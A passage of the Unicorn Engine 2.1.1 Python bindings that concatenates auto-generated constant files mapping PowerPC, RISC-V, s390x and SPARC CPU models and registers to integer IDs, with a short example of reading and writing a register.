UC_CPU_PPC32_MPC8545E_V21 = 121 UC_CPU_PPC32_MPC8547E_V20 = 122 UC_CPU_PPC32_MPC8547E_V21 = 123 UC_CPU_PPC32_MPC8548_V10 = 124 UC_CPU_PPC32_MPC8548_V11 = 125 UC_CPU_PPC32_MPC8548_V20 = 126 UC_CPU_PPC32_MPC8548_V21 = 127 
UC_CPU_PPC32_MPC8548E_V10 = 128 UC_CPU_PPC32_MPC8548E_V11 = 129 UC_CPU_PPC32_MPC8548E_V20 = 130 UC_CPU_PPC32_MPC8548E_V21 = 131 UC_CPU_PPC32_MPC8555_V10 = 132 UC_CPU_PPC32_MPC8555_V11 = 133 UC_CPU_PPC32_MPC8555E_V10 = 134 UC_CPU_PPC32_MPC8555E_V11 = 135 UC_CPU_PPC32_MPC8560_V10 = 136 UC_CPU_PPC32_MPC8560_V20 = 137 UC_CPU_PPC32_MPC8560_V21 = 138 UC_CPU_PPC32_MPC8567 = 139 UC_CPU_PPC32_MPC8567E = 140 UC_CPU_PPC32_MPC8568 = 141 UC_CPU_PPC32_MPC8568E = 142 UC_CPU_PPC32_MPC8572 = 143 UC_CPU_PPC32_MPC8572E = 144 UC_CPU_PPC32_E600 = 145 UC_CPU_PPC32_MPC8610 = 146 UC_CPU_PPC32_MPC8641 = 147 UC_CPU_PPC32_MPC8641D = 148 UC_CPU_PPC32_601_V0 = 149 UC_CPU_PPC32_601_V1 = 150 UC_CPU_PPC32_601_V2 = 151 UC_CPU_PPC32_602 = 152 UC_CPU_PPC32_603 = 153 UC_CPU_PPC32_603E_V1_1 = 154 UC_CPU_PPC32_603E_V1_2 = 155 UC_CPU_PPC32_603E_V1_3 = 156 UC_CPU_PPC32_603E_V1_4 = 157 UC_CPU_PPC32_603E_V2_2 = 158 UC_CPU_PPC32_603E_V3 = 159 UC_CPU_PPC32_603E_V4 = 160 UC_CPU_PPC32_603E_V4_1 = 161 UC_CPU_PPC32_603E7 = 162 UC_CPU_PPC32_603E7T = 163 UC_CPU_PPC32_603E7V = 164 UC_CPU_PPC32_603E7V1 = 165 UC_CPU_PPC32_603E7V2 = 166 UC_CPU_PPC32_603P = 167 UC_CPU_PPC32_604 = 168 UC_CPU_PPC32_604E_V1_0 = 169 UC_CPU_PPC32_604E_V2_2 = 170 UC_CPU_PPC32_604E_V2_4 = 171 UC_CPU_PPC32_604R = 172 UC_CPU_PPC32_740_V1_0 = 173 UC_CPU_PPC32_750_V1_0 = 174 UC_CPU_PPC32_740_V2_0 = 175 UC_CPU_PPC32_750_V2_0 = 176 UC_CPU_PPC32_740_V2_1 = 177 UC_CPU_PPC32_750_V2_1 = 178 UC_CPU_PPC32_740_V2_2 = 179 UC_CPU_PPC32_750_V2_2 = 180 UC_CPU_PPC32_740_V3_0 = 181 UC_CPU_PPC32_750_V3_0 = 182 UC_CPU_PPC32_740_V3_1 = 183 UC_CPU_PPC32_750_V3_1 = 184 UC_CPU_PPC32_740E = 185 UC_CPU_PPC32_750E = 186 UC_CPU_PPC32_740P = 187 UC_CPU_PPC32_750P = 188 UC_CPU_PPC32_750CL_V1_0 = 189 UC_CPU_PPC32_750CL_V2_0 = 190 UC_CPU_PPC32_750CX_V1_0 = 191 UC_CPU_PPC32_750CX_V2_0 = 192 UC_CPU_PPC32_750CX_V2_1 = 193 UC_CPU_PPC32_750CX_V2_2 = 194 UC_CPU_PPC32_750CXE_V2_1 = 195 UC_CPU_PPC32_750CXE_V2_2 = 196 UC_CPU_PPC32_750CXE_V2_3 = 197 UC_CPU_PPC32_750CXE_V2_4 = 198 UC_CPU_PPC32_750CXE_V2_4B = 199 UC_CPU_PPC32_750CXE_V3_0 = 200 UC_CPU_PPC32_750CXE_V3_1 = 201 UC_CPU_PPC32_750CXE_V3_1B = 202 UC_CPU_PPC32_750CXR = 203 UC_CPU_PPC32_750FL = 204 UC_CPU_PPC32_750FX_V1_0 = 205 UC_CPU_PPC32_750FX_V2_0 = 206 UC_CPU_PPC32_750FX_V2_1 = 207 UC_CPU_PPC32_750FX_V2_2 = 208 UC_CPU_PPC32_750FX_V2_3 = 209 UC_CPU_PPC32_750GL = 210 UC_CPU_PPC32_750GX_V1_0 = 211 UC_CPU_PPC32_750GX_V1_1 = 212 UC_CPU_PPC32_750GX_V1_2 = 213 UC_CPU_PPC32_750L_V2_0 = 214 UC_CPU_PPC32_750L_V2_1 = 215 UC_CPU_PPC32_750L_V2_2 = 216 UC_CPU_PPC32_750L_V3_0 = 217 UC_CPU_PPC32_750L_V3_2 = 218 UC_CPU_PPC32_745_V1_0 = 219 UC_CPU_PPC32_755_V1_0 = 220 UC_CPU_PPC32_745_V1_1 = 221 UC_CPU_PPC32_755_V1_1 = 222 UC_CPU_PPC32_745_V2_0 = 223 UC_CPU_PPC32_755_V2_0 = 224 UC_CPU_PPC32_745_V2_1 = 225 UC_CPU_PPC32_755_V2_1 = 226 UC_CPU_PPC32_745_V2_2 = 227 UC_CPU_PPC32_755_V2_2 = 228 UC_CPU_PPC32_745_V2_3 = 229 UC_CPU_PPC32_755_V2_3 = 230 UC_CPU_PPC32_745_V2_4 = 231 UC_CPU_PPC32_755_V2_4 = 232 UC_CPU_PPC32_745_V2_5 = 233 UC_CPU_PPC32_755_V2_5 = 234 UC_CPU_PPC32_745_V2_6 = 235 UC_CPU_PPC32_755_V2_6 = 236 UC_CPU_PPC32_745_V2_7 = 237 UC_CPU_PPC32_755_V2_7 = 238 UC_CPU_PPC32_745_V2_8 = 239 UC_CPU_PPC32_755_V2_8 = 240 UC_CPU_PPC32_7400_V1_0 = 241 UC_CPU_PPC32_7400_V1_1 = 242 UC_CPU_PPC32_7400_V2_0 = 243 UC_CPU_PPC32_7400_V2_1 = 244 UC_CPU_PPC32_7400_V2_2 = 245 UC_CPU_PPC32_7400_V2_6 = 246 UC_CPU_PPC32_7400_V2_7 = 247 UC_CPU_PPC32_7400_V2_8 = 248 UC_CPU_PPC32_7400_V2_9 = 249 UC_CPU_PPC32_7410_V1_0 = 250 UC_CPU_PPC32_7410_V1_1 = 251 UC_CPU_PPC32_7410_V1_2 = 252 
UC_CPU_PPC32_7410_V1_3 = 253 UC_CPU_PPC32_7410_V1_4 = 254 UC_CPU_PPC32_7448_V1_0 = 255 UC_CPU_PPC32_7448_V1_1 = 256 UC_CPU_PPC32_7448_V2_0 = 257 UC_CPU_PPC32_7448_V2_1 = 258 UC_CPU_PPC32_7450_V1_0 = 259 UC_CPU_PPC32_7450_V1_1 = 260 UC_CPU_PPC32_7450_V1_2 = 261 UC_CPU_PPC32_7450_V2_0 = 262 UC_CPU_PPC32_7450_V2_1 = 263 UC_CPU_PPC32_7441_V2_1 = 264 UC_CPU_PPC32_7441_V2_3 = 265 UC_CPU_PPC32_7451_V2_3 = 266 UC_CPU_PPC32_7441_V2_10 = 267 UC_CPU_PPC32_7451_V2_10 = 268 UC_CPU_PPC32_7445_V1_0 = 269 UC_CPU_PPC32_7455_V1_0 = 270 UC_CPU_PPC32_7445_V2_1 = 271 UC_CPU_PPC32_7455_V2_1 = 272 UC_CPU_PPC32_7445_V3_2 = 273 UC_CPU_PPC32_7455_V3_2 = 274 UC_CPU_PPC32_7445_V3_3 = 275 UC_CPU_PPC32_7455_V3_3 = 276 UC_CPU_PPC32_7445_V3_4 = 277 UC_CPU_PPC32_7455_V3_4 = 278 UC_CPU_PPC32_7447_V1_0 = 279 UC_CPU_PPC32_7457_V1_0 = 280 UC_CPU_PPC32_7447_V1_1 = 281 UC_CPU_PPC32_7457_V1_1 = 282 UC_CPU_PPC32_7457_V1_2 = 283 UC_CPU_PPC32_7447A_V1_0 = 284 UC_CPU_PPC32_7457A_V1_0 = 285 UC_CPU_PPC32_7447A_V1_1 = 286 UC_CPU_PPC32_7457A_V1_1 = 287 UC_CPU_PPC32_7447A_V1_2 = 288 UC_CPU_PPC32_7457A_V1_2 = 289 UC_CPU_PPC32_ENDING = 290 # PPC64 CPU UC_CPU_PPC64_E5500 = 0 UC_CPU_PPC64_E6500 = 1 UC_CPU_PPC64_970_V2_2 = 2 UC_CPU_PPC64_970FX_V1_0 = 3 UC_CPU_PPC64_970FX_V2_0 = 4 UC_CPU_PPC64_970FX_V2_1 = 5 UC_CPU_PPC64_970FX_V3_0 = 6 UC_CPU_PPC64_970FX_V3_1 = 7 UC_CPU_PPC64_970MP_V1_0 = 8 UC_CPU_PPC64_970MP_V1_1 = 9 UC_CPU_PPC64_POWER5_V2_1 = 10 UC_CPU_PPC64_POWER7_V2_3 = 11 UC_CPU_PPC64_POWER7_V2_1 = 12 UC_CPU_PPC64_POWER8E_V2_1 = 13 UC_CPU_PPC64_POWER8_V2_0 = 14 UC_CPU_PPC64_POWER8NVL_V1_0 = 15 UC_CPU_PPC64_POWER9_V1_0 = 16 UC_CPU_PPC64_POWER9_V2_0 = 17 UC_CPU_PPC64_POWER10_V1_0 = 18 UC_CPU_PPC64_ENDING = 19 # PPC registers UC_PPC_REG_INVALID = 0 # General purpose registers UC_PPC_REG_PC = 1 UC_PPC_REG_0 = 2 UC_PPC_REG_1 = 3 UC_PPC_REG_2 = 4 UC_PPC_REG_3 = 5 UC_PPC_REG_4 = 6 UC_PPC_REG_5 = 7 UC_PPC_REG_6 = 8 UC_PPC_REG_7 = 9 UC_PPC_REG_8 = 10 UC_PPC_REG_9 = 11 UC_PPC_REG_10 = 12 UC_PPC_REG_11 = 13 UC_PPC_REG_12 = 14 UC_PPC_REG_13 = 15 UC_PPC_REG_14 = 16 UC_PPC_REG_15 = 17 UC_PPC_REG_16 = 18 UC_PPC_REG_17 = 19 UC_PPC_REG_18 = 20 UC_PPC_REG_19 = 21 UC_PPC_REG_20 = 22 UC_PPC_REG_21 = 23 UC_PPC_REG_22 = 24 UC_PPC_REG_23 = 25 UC_PPC_REG_24 = 26 UC_PPC_REG_25 = 27 UC_PPC_REG_26 = 28 UC_PPC_REG_27 = 29 UC_PPC_REG_28 = 30 UC_PPC_REG_29 = 31 UC_PPC_REG_30 = 32 UC_PPC_REG_31 = 33 UC_PPC_REG_CR0 = 34 UC_PPC_REG_CR1 = 35 UC_PPC_REG_CR2 = 36 UC_PPC_REG_CR3 = 37 UC_PPC_REG_CR4 = 38 UC_PPC_REG_CR5 = 39 UC_PPC_REG_CR6 = 40 UC_PPC_REG_CR7 = 41 UC_PPC_REG_FPR0 = 42 UC_PPC_REG_FPR1 = 43 UC_PPC_REG_FPR2 = 44 UC_PPC_REG_FPR3 = 45 UC_PPC_REG_FPR4 = 46 UC_PPC_REG_FPR5 = 47 UC_PPC_REG_FPR6 = 48 UC_PPC_REG_FPR7 = 49 UC_PPC_REG_FPR8 = 50 UC_PPC_REG_FPR9 = 51 UC_PPC_REG_FPR10 = 52 UC_PPC_REG_FPR11 = 53 UC_PPC_REG_FPR12 = 54 UC_PPC_REG_FPR13 = 55 UC_PPC_REG_FPR14 = 56 UC_PPC_REG_FPR15 = 57 UC_PPC_REG_FPR16 = 58 UC_PPC_REG_FPR17 = 59 UC_PPC_REG_FPR18 = 60 UC_PPC_REG_FPR19 = 61 UC_PPC_REG_FPR20 = 62 UC_PPC_REG_FPR21 = 63 UC_PPC_REG_FPR22 = 64 UC_PPC_REG_FPR23 = 65 UC_PPC_REG_FPR24 = 66 UC_PPC_REG_FPR25 = 67 UC_PPC_REG_FPR26 = 68 UC_PPC_REG_FPR27 = 69 UC_PPC_REG_FPR28 = 70 UC_PPC_REG_FPR29 = 71 UC_PPC_REG_FPR30 = 72 UC_PPC_REG_FPR31 = 73 UC_PPC_REG_LR = 74 UC_PPC_REG_XER = 75 UC_PPC_REG_CTR = 76 UC_PPC_REG_MSR = 77 UC_PPC_REG_FPSCR = 78 UC_PPC_REG_CR = 79 UC_PPC_REG_ENDING = 80 
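
[A minimal usage sketch for the generated register constants above -- an editor's illustration, not a file from the source tree. It assumes a build of this tree with PPC support is importable as `unicorn`; PPC emulation in Unicorn 2 is big-endian, hence the mode flags.]

    from unicorn import Uc, UC_ARCH_PPC, UC_MODE_PPC32, UC_MODE_BIG_ENDIAN
    from unicorn.ppc_const import UC_PPC_REG_1

    mu = Uc(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN)
    mu.reg_write(UC_PPC_REG_1, 0x2000)   # r1 is the stack pointer by ABI convention
    assert mu.reg_read(UC_PPC_REG_1) == 0x2000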
unicorn-2.1.1/bindings/python/unicorn/py.typed

unicorn-2.1.1/bindings/python/unicorn/riscv_const.py

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [riscv_const.py]

# RISCV32 CPU
UC_CPU_RISCV32_ANY = 0 UC_CPU_RISCV32_BASE32 = 1 UC_CPU_RISCV32_SIFIVE_E31 = 2 UC_CPU_RISCV32_SIFIVE_U34 = 3 UC_CPU_RISCV32_ENDING = 4
# RISCV64 CPU
UC_CPU_RISCV64_ANY = 0 UC_CPU_RISCV64_BASE64 = 1 UC_CPU_RISCV64_SIFIVE_E51 = 2 UC_CPU_RISCV64_SIFIVE_U54 = 3 UC_CPU_RISCV64_ENDING = 4
# RISCV registers
UC_RISCV_REG_INVALID = 0
# General purpose registers
UC_RISCV_REG_X0 = 1 UC_RISCV_REG_X1 = 2 UC_RISCV_REG_X2 = 3 UC_RISCV_REG_X3 = 4 UC_RISCV_REG_X4 = 5 UC_RISCV_REG_X5 = 6 UC_RISCV_REG_X6 = 7 UC_RISCV_REG_X7 = 8 UC_RISCV_REG_X8 = 9 UC_RISCV_REG_X9 = 10 UC_RISCV_REG_X10 = 11 UC_RISCV_REG_X11 = 12 UC_RISCV_REG_X12 = 13 UC_RISCV_REG_X13 = 14 UC_RISCV_REG_X14 = 15 UC_RISCV_REG_X15 = 16 UC_RISCV_REG_X16 = 17 UC_RISCV_REG_X17 = 18 UC_RISCV_REG_X18 = 19 UC_RISCV_REG_X19 = 20 UC_RISCV_REG_X20 = 21 UC_RISCV_REG_X21 = 22 UC_RISCV_REG_X22 = 23 UC_RISCV_REG_X23 = 24 UC_RISCV_REG_X24 = 25 UC_RISCV_REG_X25 = 26 UC_RISCV_REG_X26 = 27 UC_RISCV_REG_X27 = 28 UC_RISCV_REG_X28 = 29 UC_RISCV_REG_X29 = 30 UC_RISCV_REG_X30 = 31 UC_RISCV_REG_X31 = 32
# RISCV CSR
UC_RISCV_REG_USTATUS = 33 UC_RISCV_REG_UIE = 34 UC_RISCV_REG_UTVEC = 35 UC_RISCV_REG_USCRATCH = 36 UC_RISCV_REG_UEPC = 37 UC_RISCV_REG_UCAUSE = 38 UC_RISCV_REG_UTVAL = 39 UC_RISCV_REG_UIP = 40 UC_RISCV_REG_FFLAGS = 41 UC_RISCV_REG_FRM = 42 UC_RISCV_REG_FCSR = 43 UC_RISCV_REG_CYCLE = 44 UC_RISCV_REG_TIME = 45 UC_RISCV_REG_INSTRET = 46 UC_RISCV_REG_HPMCOUNTER3 = 47 UC_RISCV_REG_HPMCOUNTER4 = 48 UC_RISCV_REG_HPMCOUNTER5 = 49 UC_RISCV_REG_HPMCOUNTER6 = 50 UC_RISCV_REG_HPMCOUNTER7 = 51 UC_RISCV_REG_HPMCOUNTER8 = 52 UC_RISCV_REG_HPMCOUNTER9 = 53 UC_RISCV_REG_HPMCOUNTER10 = 54 UC_RISCV_REG_HPMCOUNTER11 = 55 UC_RISCV_REG_HPMCOUNTER12 = 56 UC_RISCV_REG_HPMCOUNTER13 = 57 UC_RISCV_REG_HPMCOUNTER14 = 58 UC_RISCV_REG_HPMCOUNTER15 = 59 UC_RISCV_REG_HPMCOUNTER16 = 60 UC_RISCV_REG_HPMCOUNTER17 = 61 UC_RISCV_REG_HPMCOUNTER18 = 62 UC_RISCV_REG_HPMCOUNTER19 = 63 UC_RISCV_REG_HPMCOUNTER20 = 64 UC_RISCV_REG_HPMCOUNTER21 = 65 UC_RISCV_REG_HPMCOUNTER22 = 66 UC_RISCV_REG_HPMCOUNTER23 = 67 UC_RISCV_REG_HPMCOUNTER24 = 68 UC_RISCV_REG_HPMCOUNTER25 = 69 UC_RISCV_REG_HPMCOUNTER26 = 70 UC_RISCV_REG_HPMCOUNTER27 = 71
UC_RISCV_REG_HPMCOUNTER28 = 72 UC_RISCV_REG_HPMCOUNTER29 = 73 UC_RISCV_REG_HPMCOUNTER30 = 74 UC_RISCV_REG_HPMCOUNTER31 = 75 UC_RISCV_REG_CYCLEH = 76 UC_RISCV_REG_TIMEH = 77 UC_RISCV_REG_INSTRETH = 78 UC_RISCV_REG_HPMCOUNTER3H = 79 UC_RISCV_REG_HPMCOUNTER4H = 80 UC_RISCV_REG_HPMCOUNTER5H = 81 UC_RISCV_REG_HPMCOUNTER6H = 82 UC_RISCV_REG_HPMCOUNTER7H = 83 UC_RISCV_REG_HPMCOUNTER8H = 84 UC_RISCV_REG_HPMCOUNTER9H = 85 UC_RISCV_REG_HPMCOUNTER10H = 86 UC_RISCV_REG_HPMCOUNTER11H = 87 UC_RISCV_REG_HPMCOUNTER12H = 88 UC_RISCV_REG_HPMCOUNTER13H = 89 UC_RISCV_REG_HPMCOUNTER14H = 90 UC_RISCV_REG_HPMCOUNTER15H = 91 UC_RISCV_REG_HPMCOUNTER16H = 92 UC_RISCV_REG_HPMCOUNTER17H = 93 UC_RISCV_REG_HPMCOUNTER18H = 94 UC_RISCV_REG_HPMCOUNTER19H = 95 UC_RISCV_REG_HPMCOUNTER20H = 96 UC_RISCV_REG_HPMCOUNTER21H = 97 UC_RISCV_REG_HPMCOUNTER22H = 98 UC_RISCV_REG_HPMCOUNTER23H = 99 UC_RISCV_REG_HPMCOUNTER24H = 100 UC_RISCV_REG_HPMCOUNTER25H = 101 UC_RISCV_REG_HPMCOUNTER26H = 102 UC_RISCV_REG_HPMCOUNTER27H = 103 UC_RISCV_REG_HPMCOUNTER28H = 104 UC_RISCV_REG_HPMCOUNTER29H = 105 UC_RISCV_REG_HPMCOUNTER30H = 106 UC_RISCV_REG_HPMCOUNTER31H = 107 UC_RISCV_REG_MCYCLE = 108 UC_RISCV_REG_MINSTRET = 109 UC_RISCV_REG_MCYCLEH = 110 UC_RISCV_REG_MINSTRETH = 111 UC_RISCV_REG_MVENDORID = 112 UC_RISCV_REG_MARCHID = 113 UC_RISCV_REG_MIMPID = 114 UC_RISCV_REG_MHARTID = 115 UC_RISCV_REG_MSTATUS = 116 UC_RISCV_REG_MISA = 117 UC_RISCV_REG_MEDELEG = 118 UC_RISCV_REG_MIDELEG = 119 UC_RISCV_REG_MIE = 120 UC_RISCV_REG_MTVEC = 121 UC_RISCV_REG_MCOUNTEREN = 122 UC_RISCV_REG_MSTATUSH = 123 UC_RISCV_REG_MUCOUNTEREN = 124 UC_RISCV_REG_MSCOUNTEREN = 125 UC_RISCV_REG_MHCOUNTEREN = 126 UC_RISCV_REG_MSCRATCH = 127 UC_RISCV_REG_MEPC = 128 UC_RISCV_REG_MCAUSE = 129 UC_RISCV_REG_MTVAL = 130 UC_RISCV_REG_MIP = 131 UC_RISCV_REG_MBADADDR = 132 UC_RISCV_REG_SSTATUS = 133 UC_RISCV_REG_SEDELEG = 134 UC_RISCV_REG_SIDELEG = 135 UC_RISCV_REG_SIE = 136 UC_RISCV_REG_STVEC = 137 UC_RISCV_REG_SCOUNTEREN = 138 UC_RISCV_REG_SSCRATCH = 139 UC_RISCV_REG_SEPC = 140 UC_RISCV_REG_SCAUSE = 141 UC_RISCV_REG_STVAL = 142 UC_RISCV_REG_SIP = 143 UC_RISCV_REG_SBADADDR = 144 UC_RISCV_REG_SPTBR = 145 UC_RISCV_REG_SATP = 146 UC_RISCV_REG_HSTATUS = 147 UC_RISCV_REG_HEDELEG = 148 UC_RISCV_REG_HIDELEG = 149 UC_RISCV_REG_HIE = 150 UC_RISCV_REG_HCOUNTEREN = 151 UC_RISCV_REG_HTVAL = 152 UC_RISCV_REG_HIP = 153 UC_RISCV_REG_HTINST = 154 UC_RISCV_REG_HGATP = 155 UC_RISCV_REG_HTIMEDELTA = 156 UC_RISCV_REG_HTIMEDELTAH = 157 # Floating-point registers UC_RISCV_REG_F0 = 158 UC_RISCV_REG_F1 = 159 UC_RISCV_REG_F2 = 160 UC_RISCV_REG_F3 = 161 UC_RISCV_REG_F4 = 162 UC_RISCV_REG_F5 = 163 UC_RISCV_REG_F6 = 164 UC_RISCV_REG_F7 = 165 UC_RISCV_REG_F8 = 166 UC_RISCV_REG_F9 = 167 UC_RISCV_REG_F10 = 168 UC_RISCV_REG_F11 = 169 UC_RISCV_REG_F12 = 170 UC_RISCV_REG_F13 = 171 UC_RISCV_REG_F14 = 172 UC_RISCV_REG_F15 = 173 UC_RISCV_REG_F16 = 174 UC_RISCV_REG_F17 = 175 UC_RISCV_REG_F18 = 176 UC_RISCV_REG_F19 = 177 UC_RISCV_REG_F20 = 178 UC_RISCV_REG_F21 = 179 UC_RISCV_REG_F22 = 180 UC_RISCV_REG_F23 = 181 UC_RISCV_REG_F24 = 182 UC_RISCV_REG_F25 = 183 UC_RISCV_REG_F26 = 184 UC_RISCV_REG_F27 = 185 UC_RISCV_REG_F28 = 186 UC_RISCV_REG_F29 = 187 UC_RISCV_REG_F30 = 188 UC_RISCV_REG_F31 = 189 UC_RISCV_REG_PC = 190 UC_RISCV_REG_ENDING = 191 # Alias registers UC_RISCV_REG_ZERO = 1 UC_RISCV_REG_RA = 2 UC_RISCV_REG_SP = 3 UC_RISCV_REG_GP = 4 UC_RISCV_REG_TP = 5 UC_RISCV_REG_T0 = 6 UC_RISCV_REG_T1 = 7 UC_RISCV_REG_T2 = 8 UC_RISCV_REG_S0 = 9 UC_RISCV_REG_FP = 9 UC_RISCV_REG_S1 = 10 UC_RISCV_REG_A0 = 11 UC_RISCV_REG_A1 = 12 
UC_RISCV_REG_A2 = 13 UC_RISCV_REG_A3 = 14 UC_RISCV_REG_A4 = 15 UC_RISCV_REG_A5 = 16 UC_RISCV_REG_A6 = 17 UC_RISCV_REG_A7 = 18 UC_RISCV_REG_S2 = 19 UC_RISCV_REG_S3 = 20 UC_RISCV_REG_S4 = 21 UC_RISCV_REG_S5 = 22 UC_RISCV_REG_S6 = 23 UC_RISCV_REG_S7 = 24 UC_RISCV_REG_S8 = 25 UC_RISCV_REG_S9 = 26 UC_RISCV_REG_S10 = 27 UC_RISCV_REG_S11 = 28 UC_RISCV_REG_T3 = 29 UC_RISCV_REG_T4 = 30 UC_RISCV_REG_T5 = 31 UC_RISCV_REG_T6 = 32
UC_RISCV_REG_FT0 = 158 UC_RISCV_REG_FT1 = 159 UC_RISCV_REG_FT2 = 160 UC_RISCV_REG_FT3 = 161 UC_RISCV_REG_FT4 = 162 UC_RISCV_REG_FT5 = 163 UC_RISCV_REG_FT6 = 164 UC_RISCV_REG_FT7 = 165 UC_RISCV_REG_FS0 = 166 UC_RISCV_REG_FS1 = 167 UC_RISCV_REG_FA0 = 168 UC_RISCV_REG_FA1 = 169 UC_RISCV_REG_FA2 = 170 UC_RISCV_REG_FA3 = 171 UC_RISCV_REG_FA4 = 172 UC_RISCV_REG_FA5 = 173 UC_RISCV_REG_FA6 = 174 UC_RISCV_REG_FA7 = 175 UC_RISCV_REG_FS2 = 176 UC_RISCV_REG_FS3 = 177 UC_RISCV_REG_FS4 = 178 UC_RISCV_REG_FS5 = 179 UC_RISCV_REG_FS6 = 180 UC_RISCV_REG_FS7 = 181 UC_RISCV_REG_FS8 = 182 UC_RISCV_REG_FS9 = 183 UC_RISCV_REG_FS10 = 184 UC_RISCV_REG_FS11 = 185 UC_RISCV_REG_FT8 = 186 UC_RISCV_REG_FT9 = 187 UC_RISCV_REG_FT10 = 188 UC_RISCV_REG_FT11 = 189

unicorn-2.1.1/bindings/python/unicorn/s390x_const.py

# For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT [s390x_const.py] # S390X CPU UC_CPU_S390X_Z900 = 0 UC_CPU_S390X_Z900_2 = 1 UC_CPU_S390X_Z900_3 = 2 UC_CPU_S390X_Z800 = 3 UC_CPU_S390X_Z990 = 4 UC_CPU_S390X_Z990_2 = 5 UC_CPU_S390X_Z990_3 = 6 UC_CPU_S390X_Z890 = 7 UC_CPU_S390X_Z990_4 = 8 UC_CPU_S390X_Z890_2 = 9 UC_CPU_S390X_Z990_5 = 10 UC_CPU_S390X_Z890_3 = 11 UC_CPU_S390X_Z9EC = 12 UC_CPU_S390X_Z9EC_2 = 13 UC_CPU_S390X_Z9BC = 14 UC_CPU_S390X_Z9EC_3 = 15 UC_CPU_S390X_Z9BC_2 = 16 UC_CPU_S390X_Z10EC = 17 UC_CPU_S390X_Z10EC_2 = 18 UC_CPU_S390X_Z10BC = 19 UC_CPU_S390X_Z10EC_3 = 20 UC_CPU_S390X_Z10BC_2 = 21 UC_CPU_S390X_Z196 = 22 UC_CPU_S390X_Z196_2 = 23 UC_CPU_S390X_Z114 = 24 UC_CPU_S390X_ZEC12 = 25 UC_CPU_S390X_ZEC12_2 = 26 UC_CPU_S390X_ZBC12 = 27 UC_CPU_S390X_Z13 = 28 UC_CPU_S390X_Z13_2 = 29 UC_CPU_S390X_Z13S = 30 UC_CPU_S390X_Z14 = 31 UC_CPU_S390X_Z14_2 = 32 UC_CPU_S390X_Z14ZR1 = 33 UC_CPU_S390X_GEN15A = 34 UC_CPU_S390X_GEN15B = 35 UC_CPU_S390X_QEMU = 36 UC_CPU_S390X_MAX = 37 UC_CPU_S390X_ENDING = 38 # S390X registers UC_S390X_REG_INVALID = 0 # General purpose registers UC_S390X_REG_R0 = 1 UC_S390X_REG_R1 = 2 UC_S390X_REG_R2 = 3 UC_S390X_REG_R3 = 4 UC_S390X_REG_R4 = 5 UC_S390X_REG_R5 = 6 UC_S390X_REG_R6 = 7 UC_S390X_REG_R7 = 8 UC_S390X_REG_R8 = 9 UC_S390X_REG_R9 = 10 UC_S390X_REG_R10 = 11 UC_S390X_REG_R11 = 12 UC_S390X_REG_R12 = 13 UC_S390X_REG_R13 = 14 UC_S390X_REG_R14 = 15 UC_S390X_REG_R15 = 16 # Floating point registers UC_S390X_REG_F0 = 17 UC_S390X_REG_F1 = 18 UC_S390X_REG_F2 = 19 UC_S390X_REG_F3 = 20 UC_S390X_REG_F4 = 21 UC_S390X_REG_F5 = 22 UC_S390X_REG_F6 = 23 UC_S390X_REG_F7 = 24 UC_S390X_REG_F8 = 25 UC_S390X_REG_F9 = 26 UC_S390X_REG_F10 = 27 UC_S390X_REG_F11 = 28 UC_S390X_REG_F12 = 29 UC_S390X_REG_F13 = 30 UC_S390X_REG_F14 = 31 UC_S390X_REG_F15 = 32 UC_S390X_REG_F16 = 33 UC_S390X_REG_F17 = 34 UC_S390X_REG_F18 = 35 UC_S390X_REG_F19 = 36 UC_S390X_REG_F20 = 37 UC_S390X_REG_F21 = 38 UC_S390X_REG_F22 = 39 UC_S390X_REG_F23 = 40 UC_S390X_REG_F24 = 41 UC_S390X_REG_F25 = 42 UC_S390X_REG_F26 = 43 UC_S390X_REG_F27 = 44 UC_S390X_REG_F28 = 45 UC_S390X_REG_F29 = 46 UC_S390X_REG_F30 = 47 UC_S390X_REG_F31 = 48 # Access registers UC_S390X_REG_A0 = 49 UC_S390X_REG_A1 = 50 UC_S390X_REG_A2 = 51 UC_S390X_REG_A3 = 52 UC_S390X_REG_A4 = 53 UC_S390X_REG_A5 = 54 UC_S390X_REG_A6 = 55 UC_S390X_REG_A7 = 56 UC_S390X_REG_A8 = 57 UC_S390X_REG_A9 = 58 UC_S390X_REG_A10 = 59 UC_S390X_REG_A11 = 60 UC_S390X_REG_A12 = 61 UC_S390X_REG_A13 = 62 UC_S390X_REG_A14 = 63 UC_S390X_REG_A15 = 64 UC_S390X_REG_PC = 65 UC_S390X_REG_PSWM = 66 UC_S390X_REG_ENDING = 67 # Alias registers 
unicorn-2.1.1/bindings/python/unicorn/sparc_const.py

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.py]

# SPARC32 CPU
UC_CPU_SPARC32_FUJITSU_MB86904 = 0 UC_CPU_SPARC32_FUJITSU_MB86907 = 1 UC_CPU_SPARC32_TI_MICROSPARC_I = 2 UC_CPU_SPARC32_TI_MICROSPARC_II = 3 UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4 UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5 UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6 UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7 UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8 UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9 UC_CPU_SPARC32_TI_SUPERSPARC_II = 10 UC_CPU_SPARC32_LEON2 = 11 UC_CPU_SPARC32_LEON3 = 12 UC_CPU_SPARC32_ENDING = 13
# SPARC64 CPU
UC_CPU_SPARC64_FUJITSU = 0 UC_CPU_SPARC64_FUJITSU_III = 1 UC_CPU_SPARC64_FUJITSU_IV = 2 UC_CPU_SPARC64_FUJITSU_V = 3 UC_CPU_SPARC64_TI_ULTRASPARC_I = 4 UC_CPU_SPARC64_TI_ULTRASPARC_II = 5 UC_CPU_SPARC64_TI_ULTRASPARC_III = 6 UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7 UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8 UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9 UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10 UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11 UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12 UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13 UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14 UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15 UC_CPU_SPARC64_NEC_ULTRASPARC_I = 